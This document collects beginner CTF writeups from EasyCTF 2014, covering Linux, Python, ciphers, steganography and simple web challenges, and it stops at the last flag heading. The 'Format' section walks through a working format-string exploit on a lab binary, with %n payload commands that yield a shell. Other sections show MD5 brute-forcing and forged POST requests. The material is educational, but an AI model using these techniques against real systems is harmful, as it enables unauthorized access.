Table

of Contents
1. Introduction
2. Writeups
i. 20 - EasyCTF Survey
ii. 30 - Linux Basics 1
iii. 30 - Python Basics 1
iv. 35 - A Simple Cipher
v. 35 - Python Basics 2
vi. 35 - Linux Basics 2
vii. 40 - QR
viii. 40 - Networking
ix. 40 - Lines, Dots, and Shift Keys
x. 40 - Linux Basics 3
xi. 40 - Python Basics 3
xii. 45 - Linux Basics 4
xiii. 45 - Python Basics 4
xiv. 50 - Pointless Keys
xv. 50 - Python Basics 5
xvi. 50 - POST-it
xvii. 50 - Reversing 1
xviii. 55 - Python Basics 6
xix. 60 - A000045.txt
xx. 60 - Stegosaurus
xxi. 60 - Python Basics 7
xxii. 60 - Cookiezi Fanpage
xxiii. 60 - Format Deception
xxiv. 60 - Flowchart
xxv. 65 - Python Basics 8
xxvi. 70 - The Raven
xxvii. 70 - Just Sum Numbers
xxviii. 70 - Python Basics 9
xxix. 70 - Brutus
xxx. 70 - Hashing
xxxi. 70 - Format
xxxii. 75 - Golden Ratio Obsession
xxxiii. 75 - Corruption
xxxiv. 75 - Python Basics 10
xxxv. 80 - Easy As CTF Gets
xxxvi. 80 - Injection
xxxvii. 90 - Obfuscation 1
xxxviii. 90 - Pixelated
xxxix. 95 - Brachiosaurus
xl. 100 - Project Eratosthenes
xli. 100 - Palindrama
xlii. 120 - Fast Math
xliii. 130 - Reversing 2 (TODO)
xliv. 150 - Ghoti
xlv. 160 - Obfuscation 2
xlvi. 180 - The Door (TODO)
xlvii. 180 - Evil Guess (TODO)
xlviii. 180 - RSA
xlix. 200 - Guessing is Hard
l. 230 - failedxyz

EasyCTF Writeups
someone write some really inspiring stuff here
Thanks for playing EasyCTF! Here are the solutions to the problems. If you have something to add, feel free to make a pull
request to https://github.com/easyctf/writeups-2014.

Reflection
Our purpose in making this CTF was to help people learn programming and about systems in general. Consequently, after
some processing, we'll leave the problems and site up after the contest.
We really enjoyed running this CTF and we hope you really enjoyed playing it. There will be more high school CTFs coming
up, so you better be there :).

Credits
I'd like to thank all those people who helped make EasyCTF happen.
Robert Gammelgaard - Computer Science Teacher
And these previous CTF organizers who helped a lot with monitoring the IRC and other details about every aspect of the
competition.
Alok Tripathy - HSCS.io
Jacob Edelman - HSCS.io
Thanks to Max Serrano from PPP for help and advice.
Also thanks to PicoCTF for their amazing CTF platform.
Thanks to Scott Wu for hosting part 3 of the flag for failedxyz.
I'd like to thank our sponsors:
The Flatiron School
Edmodo
HSCS.io
Uber
Finally, thanks to the participants for making this a fun experience.

Writeups
This section will contain writeups (solutions) for problems.
More writeups coming soon.

20 - EasyCTF Survey
Written by Michael Zhang

Problem
Free points guyz.
Since this is the first time we're holding this competition, we'd like some feedback on how we can improve. Come on, it's
just ~5 minutes or so for 20 free points.
EasyCTF Feedback Survey

Hint
Just click the link and complete the survey! No tricks here!

Solution
Complete the survey.

Flag
hellllyeah

30 - Linux Basics 1
Written by Michael Zhang

Problem
Many servers (including web servers) are run on machines that use an operating system called Linux. Most of you are
familiar with an operating system such as Windows or Mac OS X, or maybe a mobile operating system such as Android or
iOS.
Linux has a shell, or a command-line interface, which is similar to an interface you may see when you open Command
Prompt on Windows or Terminal on Mac. In a shell, you type commands to the machine and it executes your command.
Before you can learn how to hack, you have to learn how Linux works. Some basics for using linux:
echo - similar to print in most programming languages. Typing echo "hi" will literally print the word "hi" to the

screen.
cd - stands for change directory. When you execute a command, you are always doing so from a specific directory. To

change the directory, type cd and whichever directory you want to go to.
In the first problem, we'll learn about a function called ls . Log in to the web shell, and type cd /problems/ls to get started.

Hint
If you're still unsure how to solve this problem, ask for help on the chat or take a look on our Learn page.

Solution
login as: user37142
user37142@shell.easyctf.com's password:
user37142@easyctf:~$ cd /problems/ls
user37142@easyctf:/problems/ls$ ls
look_i_am_a_flag.txt

Flag
look_i_am_a_flag or look_i_am_a_flag.txt

30 - Python Basics 1
Written by Michael Zhang

Problem
Welcome to Python crash course! To get started, head over to the Python Editor and print the string Hello, EasyCTF!
exactly like that to the console.

Hint
Not sure how to print in Python? Look it up (maybe on our Learn page?)! It probably uses the print function.

Solution
print "Hello, EasyCTF!"

Flag
don't_worry_it's_gonna_get_harder_for_all_you_pros

35 - A Simple Cipher
Written by Devin Deng

Problem
Cryptography is hiding messages in plain sight. Although they can be viewed, they are usually unreadable without the use
of a special key. Messages can be encrypted and then sent to another person who then decrypts the ciphertext (encrypted
message) using their special key into plaintext (readable text). Try your hand at this Caesar cipher:
IGKYGX HKIGSK ZNK LOXYZ XUSGT MKTKXGR ZU IXUYY HUZN CNKT NK HAORZ G HXOJMK GIXUYY ZNK XNOTK
GTJ IUTJAIZKJ ZNK LOXYZ OTBGYOUT UL HXOZGOT.ZNKYK GINOKBKSKTZY MXGTZKJ NOS ATSGZINKJ
SOROZGXE VUCKX GTJ ZNXKGZKTKJ ZU KIROVYK ZNK YZGTJOTM UL VUSVKE, CNU NGJ XKGROMTKJ
NOSYKRL COZN ZNK YKTGZK GLZKX ZNK JKGZN UL IXGYYAY OT 53 HI. COZN ZNK MGRROI CGXY IUTIRAJKJ,
ZNK YKTGZK UXJKXKJ IGKYGX ZU YZKV JUCT LXUS NOY SOROZGXE IUSSGTJ GTJ XKZAXT ZU XUSK. IGKYGX
XKLAYKJ, GTJ SGXQKJ NOY JKLOGTIK OT 49 HI HE IXUYYOTM ZNK XAHOIUT COZN G RKMOUT, RKGBOTM NOY
VXUBOTIK GTJ ORRKMGRRE KTZKXOTM XUSGT ZKXXOZUXE ATJKX GXSY. IOBOR CGX XKYARZKJ, LXUS CNOIN
NK KSKXMKJ GY ZNK ATXOBGRKJ RKGJKX UL XUSK. ZNK LRGM OY IGKYGX_OY_NUSK.

Hint
Don't worry, it'll get harder. ;)

Solution
In a caesar cipher all the letters are shifted by the same amount. Use this tool to solve this cipher. This website has an
algorithm that can guess the key, which turns out to be 20. The final text is:
CAESAR BECAME THE FIRST ROMAN GENERAL TO CROSS BOTH WHEN HE BUILT A BRIDGE ACROSS THE
RHINE AND CONDUCTED THE FIRST INVASION OF BRITAIN.THESE ACHIEVEMENTS GRANTED HIM UNMATCHED
MILITARY POWER AND THREATENED TO ECLIPSE THE STANDING OF POMPEY, WHO HAD REALIGNED HIMSELF
WITH THE SENATE AFTER THE DEATH OF CRASSUS IN 53 BC. WITH THE GALLIC WARS CONCLUDED, THE
SENATE ORDERED CAESAR TO STEP DOWN FROM HIS MILITARY COMMAND AND RETURN TO ROME. CAESAR
REFUSED, AND MARKED HIS DEFIANCE IN 49 BC BY CROSSING THE RUBICON WITH A LEGION, LEAVING HIS
PROVINCE AND ILLEGALLY ENTERING ROMAN TERRITORY UNDER ARMS. CIVIL WAR RESULTED, FROM WHICH
HE EMERGED AS THE UNRIVALED LEADER OF ROME. THE FLAG IS CAESAR_IS_HOME.

Flag
CAESAR_IS_HOME

35 - Python Basics 2
Written by Emily Leng

Problem
You're faced with a control panel. There are some instructions left on a sign nearby on the wall: This machine generates
random numbers that you can access through the variable args[0] . If the number is greater than or equal to 0 and less
than 100, print hacks . If the number is greater than or equal to 100, print haxx . If the number is negative, print hakz . Use
the IDE (Python Editor) to complete this problem.

Hint
What are conditionals?

Solution
x = args[0]
if x >= 100:
print "haxx"
elif x >= 0:
print "hacks"
else:
print "hackz"

Flag
just-simple-logic-no-haxx-involved

35 - Linux Basics 2
Written by Michael Zhang

Problem
Now that you're somewhat familiar with how the Linux shell works, we'll move on to another command that is useful: cat.
To solve this problem, log into the shell server, and try to find out what's inside /problems/cat/flag.txt !

Hint
There are multiple ways to solve this problem; kudos to you if you find them all!

Solution
login as: user37142
user37142@shell.easyctf.com's password:
user37142@easyctf:~$ cat /problems/cat/flag.txt
see_linux_isn't_so_scary_after_all

Flag
see_linux_isn't_so_scary_after_all

40 - QR
Written by Emily Leng

Problem
Something appears to be wrong with this QR. Can you fix it?

Hint
The QR looks like it's missing some pixels...

Solution
The QR is missing some pixels at the top and the right sides. Luckily, reading an image through a camera is almost always
extremely inaccurate, so most optical QR scanners are able to compensate.
Just scan the QR using Google Goggles.

Flag
QRs_r_2D_baRcoDEz

40 - Networking
Written by Emily Leng

Problem
Networking covers everything that is related to our computer's interactions with other computers over the Internet or
through some other connection. Sometimes we can trace these interactions and analyze them in order to acquire
information.
You might need to install a piece of software called WireShark for this problem. Analyze the input file and look through all
packets for information that might be related to a flag.
Here is the file in an online viewer, CloudShark:
https://www.cloudshark.org/captures/1c66eb3587a1
Alternatively, here is the source file if you like to download it and view it in WireShark:
Input File

Hint
It seems like information is being recorded as a form is submitted, through a POST request.

Solution
Looking through the network packets, there is a HTTP POST request with the following values:

username=ctf&password=flagisnetworkingispowerful&submit=Login

Flag
networkingispowerful

40 - Lines, Dots, and Shift Keys

Written by Emily Leng

Problem
.... - - .--. ---... -..-. -..-. - .. -. -.-- ..- .-. .-.. .-.-.- -.-. --- -- -..-. .-.. .. -. . ... .- -. -.. -.. --- - ...

Hint
Haven't you already used a Shift Key in a previous problem?

Solution
By translating the code we get
HTTP://TINYURL.COM/LINESANDDOTS
We are redirected to this document and get a caesar cipher. Decoding it yeilds the key.

$ echo "snhj btwp! ymnx hnumjw xmtzqi gj kfrnqnfw yt dtz, tw rfdgj sty. fsdbfd, fx f wjbfwi, mfaj ymnx kqfl. q1s3x_fsi_i0yx_y0_b0wie"|c
nice work! this cipher should be familiar to you, or maybe not. anyway, as a reward, have this flag. l1n3s_and_d0ts_t0_w0rdz

Flag
l1n3s_and_d0ts_t0_w0rdz

40 - Linux Basics 3
Written by Michael Zhang

Problem
Ok, so now you know how to list files and read files... this is starting to sound more like a file manager you are familiar with,
right? So what's left now? Searching.
Luckily, there's also a command for that: grep . You know the drill, read up on the command, and then solve the problem in
/problems/grep .

The flag is the filename of the file containing the string yep! . All other files will contain the string nope! .

Hint
What character stands for "all files"?

Solution
login as: user37142
user37142@shell.easyctf.com's password:
user37142@easyctf:~$ cd /problems/grep
user37142@easyctf:/problems/grep$ grep "yep!" *
27054997:yep!

Flag
27054997

40 - Python Basics 3
Written by Emily Leng

Problem
How can you add strings in print statements? args is an array of 5 variables than can be accessed with args[0] , args[1]
etc. Write some python code in the IDE to concatenate the variables together before printing.

Hint
Hmmm... how can you turn that pesky integer into a string?

Solution
tmp = ""
for i in range(len(args)):
tmp += str(args[i])
print tmp

Flag
stupid_ints_causing_those_annoying_type_errorz

45 - Linux Basics 4
Written by Michael Zhang

Problem
Alright time to get to some fun stuff: binaries. A binary is just a really fancy word that means a file (or in this case, a
program) that contains some bits that are not text.
The binary in this problem is a program. When you run it, it'll ask you for an input, but not just any input: a special character.
To run this binary, navigate to the folder /problems/pipe and run ./pipe .
The source code is available for download here, or you can find it at /problems/pipe/pipe.c on the shell server. The flag
has been redacted.

Hint
A pipe can refer to a number of things, but the one you are probably most concerned about is this | symbol.

Solution
$ echo -e "\\x7" | ./pipe
Please enter the character \x07 to get the flag!
Wow! Your flag is: thats_so_nice

Flag
thats_so_nice

45 - Python Basics 4 (TODO)

Written by Emily Leng

Problem
args is an array of 5 variables than can be accessed with args[0] , args[1] etc. Write some python code in the IDE to

concatenate args[0] , args[1] 's type ( string or integer ), args[2] 's length, args[3] 's square root as an integer (will
be a perfect square), and args[4] in reverse.
Clarification: for args[0] , concatenate its value, not its type.

Hint
I hope you're taking notes; this stuff will be on the harder problems :)

Solution
This was the intended solution, but it turns out Skulpt does not implement the type method very well, but since you know
args[3] is either a string or an integer, it is pretty easy to obtain the flag.

import math
print args[0]+str(type(args[1]))+str(len(args[2]))+str(math.sqrt(args[3]))+str(args[4][::-1])

Flag
combine_all_y0ur_kn0wledge

50 - Pointless Keys
Written by Michael Zhang

Problem
Well this sure is a useless looking website. Still, I wonder if something is hidden in it.
Pointless website

Hint
You may want to look at some of the JavaScript source code.

Solution
// konami
Array.prototype.compare = function(o) {
if (this.length != o.length) return false;
for (var i = 0; i < this.length; i++) {
if (this[i] != o[i]) return false
}
return true
};
if (window.addEventListener) {
var kkeys = [],
tkeys = [38, 38, 40, 40, 37, 39, 37, 39, 66, 65, 66, 65, 13];
window.addEventListener("keydown", function(e) {
kkeys.push(e.keyCode);
var k = kkeys.join(",");
var t = tkeys.join(",");
if (k.indexOf(t) >= 0) {
$.ajax({
url: "/sites/pointless-keys/flag.php",
type: "POST",
data: {
keys: kkeys,
target: tkeys
},
dataType: "html",
success: function(content) {
console.log(content);
},
});
kkeys = [];
}
}, true)
}

The comment konami implies that you have to perform a konami code sequence on the page. However, closely examine
the source code, and you'll notice that the sequence in tkeys doesn't exactly match the konami code.

[38, 38, 40, 40, 37, 39, 37, 39, 66, 65, 66, 65, 13]

is actually: UP UP DOWN DOWN LEFT RIGHT LEFT RIGHT B A B A ENTER

If you perform this sequence on the page, then check the console (since it prints the flag to the console), then you would
find your flag.

Flag
konami_c0dez

50 - Python Basics 5
Written by Emily Leng

Problem
Given an list of unknown length of strings stored in args , for each string, take the first two characters and concatenate
them into another string variable. Print the final variable.

Hint
Strings are very similar to lists...

Solution
The indexes of letters in a string can referred to like the indexes of items in an array or a list. The notation for this is
string[start,end,increment] . If you leave the first part of the notation blank, the start value will default to zero. If you leave

the second part blank, the end value will be the length of the string but exclusive (so think length -1), and if the increment is
left blank, then it will default to 1.

s = ""
for x in args:
s += x[:2]
print s

Flag
its_string_slicing_not_pi(e)_slicing

50 - POST-it
Written by Michael Zhang Writeup by Sean Anderson

Problem
You need to gain access to this site, but it looks like you have the wrong POST values! Hmm..
http://easyctf.com/sites/post-it

Hint
It may be helpful to look into what POST requests are. How can you use this?

Solution
Using curl, you can manually specify POST values

$ curl --data "user=admin&request=flag" http://www.easyctf.com/sites/post-it

flag: p0st_is_moar_secure_than_g3t$

Flag
p0st_is_moar_secure_than_g3t

50 - Reversing 1
Written by Michael Zhang

Problem
Looks like you need to find the password that is the flag from this binary.
/problems/reversing1

Hint
I bet the flag is stored as a string... how can we see all the strings in a binary?

Solution
login as: user37142
user37142@shell.easyctf.com's password:
user37142@easyctf:~$ cd /problems/reversing1
user37142@easyctf:/problems/reversing1$ strings reversing1
/lib64/ld-linux-x86-64.so.2
CyIk
libstdc++.so.6
__gmon_start__
_Jv_RegisterClasses
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
__pthread_key_create
_ZNSsD1Ev
_ZNSt8ios_base4InitD1Ev
_ZNSsC1EPKcRKSaIcE
_ZNSaIcEC1Ev
_ZSt3cin
_ZStrsIcSt11char_traitsIcESaIcEERSt13basic_istreamIT_T0_ES7_RSbIS4_S5_T1_E
_ZNKSs7compareERKSs
__gxx_personality_v0
_ZSt4cout
_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc
_ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_
_ZNSaIcED1Ev
_ZNSsC1Ev
_ZNSolsEPFRSoS_E
_ZNSt8ios_base4InitC1Ev
libgcc_s.so.1
_Unwind_Resume
libc.so.6
__cxa_atexit
__libc_start_main
GCC_3.0
GLIBC_2.2.5
CXXABI_1.3
GLIBCXX_3.4
[]A\A]A^A_
eeeeeeeeeeeeeEeesy_ctf
Enter the password to continue.
Yay, you got the right flag!
Darn, you didn't get the right flag.
;*3$"
zPLR

One of those strings looks really suspicious.

Flag

 eeeeeeeeeeeeeEeesy_ctf

55 - Python Basics 6
Written by Emily Leng

Problem
Given an integer value stored in args[0] , find the sum of all numbers less than or equal to args[0] and greater than zero
that are divisible by 7. Then, print the sum of all the digits of the original sum to get your answer.

Hint
What is a math operation to check divisibility?

Solution
tmp = 0
for i in range(7, args[0]):
if i % 7 == 0:
tmp += i
digits = 0
while tmp:
digits += tmp % 10
tmp /= 10
print digits

Flag
beginner_math_loops_5_e_z_3_me

60 - A000045.txt
Written by Michael Zhang

Problem
A friend has created a code for you to guess because he has no life and spends all his time making this kind of stuff.
Anyways, here it is: A000045.txt

Hint
Ask Google what A000045 might mean.

Solution
A quick Google search for A000045 would bring up the fibonacci numbers. Just use the fibonacci numbers as array indices
for the characters in A000045.txt.

fib = [0,1,1,2,3,5,8,13,21,34,55,89,144,233,377,610,987,1597,2584,4181,6765,10946,17711,28657,46368,75025,121393,196418
f = open('A000045.txt', 'r')
stuff = f.read().strip()
result = ''
for x in fib:
if x >= len(stuff):
break
result += stuff[x]
print result

The result printed is pffibonacciiscoolandtheflagisrecursion

Flag
recursion

60 - Stegosaurus
Written by Emily Leng

Problem
Try your hand at some stego.

Hint
Open up the problem in a hex editor and take a look around.

Solution
Open stegosaurus.jpg in hexdump in the Linux terminal.
$ hd stegosaurus.jpg

At the bottom, you will see:

000144e0 54 48 49 53 20 57 41 53 20 45 41 53 59 20 00 00 |THIS WAS EASY ..|

000144f0 4e 45 58 54 20 54 49 4d 45 20 57 49 4c 4c 00 00 |NEXT TIME WILL..|
00014500 42 45 20 48 41 52 44 45 52 0d 0a ae 28 44 76 94 |BE HARDER...(Dv.|
00014510 46 4c 41 47 20 49 53 20 5c b0 c8 1b b9 35 2c 4c |FLAG IS \....5,L|
00014520 68 33 78 5f 31 73 5f 63 30 30 6c 20 4f e0 3a 57 |h3x_1s_c00l O.:W|

Flag
h3x_1s_c00l

60 - Python Basics 7
Written by Emily Leng

Problem
Given an list of integers stored in args[0] and an integer k stored in args[1] , sort them in descending order, then print the
value at array index k from the sorted list.

Hint
I wonder if there's a built in sort function?

Solution
Python has a handy built in sort function! And, the indexes of strings can be referred to like the indexes in arrays or lists.

a = args[0]
a.sort(reverse = True)
print a[args[1]]

Flag
arrays_aren't_hard_because_python_rocks

60 - Cookiezi Fanpage
Written by Michael Zhang

Problem
Cookiezi has been banned from osu! forever, but we'll never forget him!
Only those who truly believe in the return of Cookiezi can enter this site.

Hint
Yum yum yum what could be more delicious than chocolate chip cookies? HTTP cookies, of course!

Solution
The flag is stored in a cookie when you visit the webpage. Just open the developer console (ctrl+shift+c in most browsers)
and type alert(document.cookie) into the Javascript console. The flag will appear in an alert box.

Flag
osu_is_love_osu_is_l1fe

60 - Format Deception
Written by Michael Zhang and Sean Anderson, Writeup by MegaAbsol

Problem
What kind of file is this (format_deception.nds)?

Hint
After you manage to open the .nds file, (if you don't know how, Google is your best friend), look around for your flag. Maybe
go against your first instinct.

Solution
$ file format_deception.nds
format_deception.nds: OpenDocument Text
$ libreoffice format_deception.nds

A document with the flag inside.

Flag
d0nt_judg3_a_file_by_1ts_ext3nsi0n

60 - Flowchart
Written by Emily Leng

Problem
How do loops work? Examine the flowchart left for you, then match the letter choices to the correct loop. Submit the result
of the loops in the order the diagrams are drawn (without line breaks or spaces) as your solution.
Clarification: the "flag" should be the output of the loops in the order they are shown (without line breaks or spaces), not the
letter choices.

Hint
Java has several types of loops - for , for each , while , do-while - how do they differ from each other? And how do flow
controls like breaks or switch statements affect how code runs?

Solution
The multiple choices for the loops in the order as drawn are:
1. B
2. A
3. C
4. E
5. F
6. D
Their corresponding outputs (without line breaks or spaces) can be logically thought out, run in java, or translated to
another language and then run if you don't like java. Anyway, you end up with these:
1. 024024024
2. 01234
3. 07325
4. 01234
5. 020202
6. 0297499161411161614111616131818

Flag
0240240240123407325012340202020297499161411161614111616131818

65 - Python Basics 8
Written by Emily Leng, Writeup by Tim Winters

Problem
A boolean is a value that is either True or False. Given an list of arrays of integers as [a,b] stored in args , for each array,
if the sum of a + b <= 25 then concatenate the value "1" to represent the value True to a string. Otherwise, concatenate
"0" to represent the value False .

Hint
Use your knowledge from previous problems and apply it here!

Solution
Python allows you to store an array as individual values in a for loop.

x=""
for a,b in args:
if a+b<=25:
x+="1"
else:
x+="0"
print x

Flag
b0ole4n_l0g1c_011000100110100101101110011000010111001001111001

70 - The Raven
Written by Michael Zhang, Writeup by MegaAbsol

Problem
Once upon a midnight dreary, while I pondered, weak and weary, Over many a quaint and curious volume of forgotten lore
While I nodded, nearly napping, suddenly there came a tapping, As of some one gently rapping, rapping at my chamber
door "'Tis some visitor," I muttered, "tapping at my chamber door Only this and nothing more."
Ah, distinctly I remember it was in the bleak December; And each separate dying ember wrought its ghost upon the floor.
Eagerly I wished the morrow; vainly I had sought to borrow From my books surcease of sorrow sorrow for the lost
Lenore For the rare and radiant maiden whom the angels name Lenore Nameless here for evermore.
ciphertext: 6 11 22 28 66 uooy htue mghn salc mria rrop clns pggl eoie nioo ifdt iwtd eres atau odgh dfgr doti dwii sbsc eato
eorf gjgr sron owud sefe

Hint
Poems were used in cryptography in WW2 to encrypt messages, but were regarded as extremely insecure. Those first five
numbers look important - what could they be referring to in the poem?

Solution
Searching up "poem code" on google, we get some idea of how poem codes work. It seems that the key is the 6th, 11th,
22nd, 28th, and 66th words. This means while, weary, while, there, and bleak. So our key is whilewearywhiletherebleak.
Then, this means that the "ordering" is 22 10 13 16 4 23 5 1 19 25 24 11 14 17 6 20 12 7 20 8 3 18 9 2 15, where the 1
corresponds with the first "a" in our key, the 2 corresponds with the second "a", and so on. What this means is that uooy,
the first block of text, corresponds with the 22nd column of plaintext.
Putting it together, we get:

poemcodeshidmessagesdurin
gworldwartwogreatjobforfi
guringitouttheflagisgoodo
ldfashionedinsecurecrypto

Flag
goodoldfashionedinsecurecrypto

70 - Just Sum Numbers

Written by Emily Leng

Problem
Algorithmic problems require you to write a program to solve the problem in the online python editor. Data will be generated
randomly, as well as the solutions. If your program produces the required answer, the flag will be given to you. You can find
this using the python link in the navigation menu above.
Given positive integers A, B, C, and L, find the sum of all the distinct multiples of A, B, and C under L.
The variables A, B, C, and L are passed through an array of variables called args. You don't have to create this; it's already
there for you. This is how the generated data is passed to your program:
args = [A, B, C, L];

Hint
If you don't know how to do this problem just yet, try the Python Basics problem series first.

Solution
s = 0
for x in range(0,args[3]):
if x%args[0]==0 or x%args[1]==0 or x%args[2]==0:
s += x
print s

Flag
is_this_pr0jekt_o1ler?

70 - Python Basics 9
Written by Emily Leng

Problem
Head over to the Python Editor and print the greatest common factor between args[0] and args[1] .

Hint
Defining a function that finds a GCF will be of use.

Solution
def gcd(x, y):
while y != 0:
(x, y) = (y, x % y)
return x
print gcd(args[0],args[1])

Flag
programming_beats_calculating_by_hand_any_day

70 - Brutus
Written by Emily Leng
Writeup by Jester

Problem
It appears the only thing you know about the flag is its MD5 hash f54f10fd6e38929084d505d0c2e9c997, and that the flag is
formatted in this way: [number][adjective][color][animal] without the brackets.
Luckily, you have found some lists of the words that may have been used.
Tribute to http://hsctf.com

Hint
As the title suggests, brute forcing the answer is necessary.

Solution
The easiest way to brute force a problem, of course, is writing a script. For this solution, the script will be written in python.
To encrypt a string in md5 in python, we need to first write a function that returns the encrypted string given a string. To do
this in python, we can import hashlib, then write a function that looks like:
Code:

import hashlib
def MD5hash(string):
m = hashlib.md5()
m.update(string.encode('utf-8'))
return m.hexdigest()

Then, we can make lists in python that contain the various strings given, then use a while loop to connect them in order
such that we will inevitably get the right string, which it will print it if it is.
So, our final code looks like:

import hashlib
def MD5hash(string):
m = hashlib.md5()
m.update(string.encode('utf-8'))
return m.hexdigest()
numbers = ['1','2','3','4','5','6','7','8','9','10']
colors = ['red','orange','yellow','green','blue','purple','pink','white','black']
animals = ['cats','dog','mice','birds','fish','turtles','elephants','snakes','pigs','cows','goats']
adjectives = ['cool','smart','funny','happy','weird','strange','normal','big','small','angry']
c1 = 0
while c1 < len(numbers):
c2 = 0
while c2 < len(adjectives):
c3 = 0
while c3 < len(colors):
c4 = 0
while c4 < len(animals):
if str(MD5hash(str(numbers[c1]+adjectives[c2]+colors[c3]+animals[c4]))) == 'f54f10fd6e38929084d505d0c2e9c997'

 print(numbers[c1]+adjectives[c2]+colors[c3]+animals[c4])
c4 += 1
c3 += 1
c2 += 1
c1 += 1

And it prints out the flag!

Flag
5happypurpleturtles

70 - Hashing
Written by Austin Zhou

Problem
I found this hashed password dqcxxkgegmrunaue and its hashing algorithm hash1.py. Can you find the password?

Hint
Maybe there's more than 1 password that works...

Solution
When inspecting the algorithm we can see that each letter is generated one at a time. So the first letter affects the first letter
in the hash and the second letter affects the second letter in the hash etc. So an easy brute force algorithm can be written.

text = "dqcxxkgegmrunaue"
flag= ""
for a in range(len(text)):
for b in [chr(i) for i in range(97,97+26)]:
if hash1(b)[0] == text[a]:
flag += b
break
print flag

One possible answer then would be kxjeernlntybuhbl

But the original string was actually xxxXXX_nobody123will123evar123know234this345flag_XXXxxx

Flag
(Several possible answers)
kxjeernlntybuhbl
xxxXXX_nobody123will123evar123know234this345flag_XXXxxx

70 - Format
Written by Michael Zhang and Sean Anderson

Problem
The function printf can do a lot of great things, but depends on how you use it. Try to exploit this very irresponsible use of
printf.
Problem can be found at /problems/format1 and source can be downloaded here.

Hint
This line might interest you... printf(argv[1]); . What happens if no format arguments are provided?

Solution
This program does not use printf correctly, using user input as a format string. This allows the user to view and modify the
stack of the program. For example, to view some data on the stack, simply put a valid format string as the program's first
argument:

$ ./format1 %x
1bc3be08$

At first glance, it seems that all printf can do is print data, however it can also write abitrary values using the %n format
string. From the man page:
The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument.
No argument is converted.
Therefore, all we need to do is write more than 9000 characters, and vuln() will execute. To do this, we need to find out
what pointer the program uses to refer to key . First, lets load up get a disassembly with objdump -d format1

000000000040064e <main>:
40064e: 55 push %rbp
40064f: 48 89 e5 mov %rsp,%rbp
400652: 48 83 ec 20 sub $0x20,%rsp
400656: 89 7d ec mov %edi,-0x14(%rbp)
400659: 48 89 75 e0 mov %rsi,-0x20(%rbp)
40065d: 48 c7 45 f8 50 10 60 movq $0x601050,-0x8(%rbp)
400664: 00
400665: 48 8b 45 e0 mov -0x20(%rbp),%rax
400669: 48 83 c0 08 add $0x8,%rax
40066d: 48 8b 00 mov (%rax),%rax
400670: 48 89 c7 mov %rax,%rdi
400673: b8 00 00 00 00 mov $0x0,%eax
400678: e8 63 fe ff ff callq 4004e0 <printf@plt>
40067d: 8b 05 cd 09 20 00 mov 0x2009cd(%rip),%eax # 601050 <__TMC_END__>
400683: 3d 28 23 00 00 cmp $0x2328,%eax
400688: 7e 0a jle 400694 <main+0x46>
40068a: b8 00 00 00 00 mov $0x0,%eax
40068f: e8 82 ff ff ff callq 400616 <vuln>
400694: b8 00 00 00 00 mov $0x0,%eax
400699: c9 leaveq
40069a: c3 retq
40069b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)

We can see that in 40065d , 0x601050 is stored onto the stack as a local variable. Next, lets see where on the stack the
local variable is when we run printf:

$ ./format1 %x-%x-%x-%x-%x-%x-%x-%x-%x-%x
42d3038-42d3050-4006a0-e1bdce80-e1bdce80-42d3038-400520-42d3030-601050-4006a0$

We can see that the pointer 601050 is the 9th value on the stack. (In the competition it was the 7th, but this is a different
compile). Based on this information, the input of the program should be

$ ./format1 garbagedata%x%x%x%x%x%x%x%x%n

It is very tedious to type out over 9000 characters of garbage, so we will create a file with this data.

$ for i in `seq 1 9000`; do echo -n "x"; done > ~/xs.txt

$ echo "%x%x%x%x%x%x%x%x%n" | cat ~/xs.txt - > ~/arg.txt

Now that we have the garbage, all we have to do is feed it into the program and get the flag.

$ xargs -a ~/arg.txt ./format1

xxxxxxxxxxxxxxxxxxxxxxxx ... xxxxxxxx$ whoami
format1
$ cat flag.txt
it's over 9000!!11!1one1!
$ exit

Flag
it's over 9000!!11!1one1!

75 - Golden Ratio Obsession

Written by Austin Zhou

Problem
Find the Number of Digits in the 16th Fibonacci Number that Contains 1618 and is Divisible by 1618.

Hint
Use your knowledge from the previous basic python problems! (You are not, however, limited to python for this problem you can compute the answer in any language you'd like.)

Solution
Using your python knowledge from python basics it should be easy to write a brute force algorithm.

def fib():
a = 1
b = 1
while True:
a,b = a+b,a
yield a
count = 0
for i in fib():
if "1618" in str(i) and i%1618==0:
count+=1
if count == 16:
print len(str(i))
break

This should yield the number 7092 and that is your flag.

Flag
7092

75 - Corruption
Written by Michael Zhang, Writeup by Tim Winters

Problem
You revieved a zip file but find that it is orrupted! You're given that it's missing a couple of bytes at the beginning. Replace
these bytes and find the flag

Hint
No clue what bytes to insert? Perhaps looking into file headers would be helpful. Also, you might want to download a hex
editor, such as HxD.

Solution
A google seach of .zip file headers will lead you to this website. Ctrl-F ".zip" shows that the file header for a .zip file is 50
4B 03 04

If we open the file in a hex editor program, it shows the first byte as 03 04 14 00 . We need it to be 50 4B 03 04 , and we
have 03 04 , so by adding 50 4B the first byte is 50 4B 03 04 and the file will extract.
In the extracted folder, we see a number of files (3000). Opening a file in a text editor reveals a series of characters. To find
the flag, use the findstr ( grep for mac) and search for "flag" in all files. To search all files, use a '*'. The final command
will be grep flag * . The flag is hidden in file f2590 .

Flag
ph1l_k4tz

75 - Python Basics 10
Written by Emily Leng

Problem
args[0] is a result of XOR encryption on two hexadecimal strings. You only know one of the two original strings, args[1] ,

can you find the other?

Clarification: after finding the second string you should print the ascii representation of it as the answer in the Python Editor.

Hint
The operation ^ in python only works on numbers. The built in functions ord() and chr() convert between characters
and numbers.

Solution
def xor_strings(xs, ys):
return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(xs, ys))
a = ''.join([chr(int(''.join(c), 16)) for c in zip(args[0][0::2], args[0][1::2])])
b = ''.join([chr(int(''.join(c), 16)) for c in zip(args[1][0::2], args[1][1::2])])
c = xor_strings(a,b)
print c

Flag
x0r_encrypti0n_is_be_e4sy_t0_crack

80 - Easy As CTF Gets

Written by Emily Leng
Writeup by Jester

Problem
What could this possibly mean?
xhwdlsibxnmwvinalpdcbsymzzx

Hint
Perhaps you could try one of these ciphers.

Solution
At first glance, this problem seems remarkably easy, even for an 80 point problem. However, as you try all the ciphers in the
given link, you find that none of them work (unless you got it instantly, of course).
Eventually, the realization that a key is needed pops into your head. But what is the key?
To decipher the ciphertext, go to vigenere on the site given, and the key is... "easyasctfgets"
And voila! You get the flag!

Flag
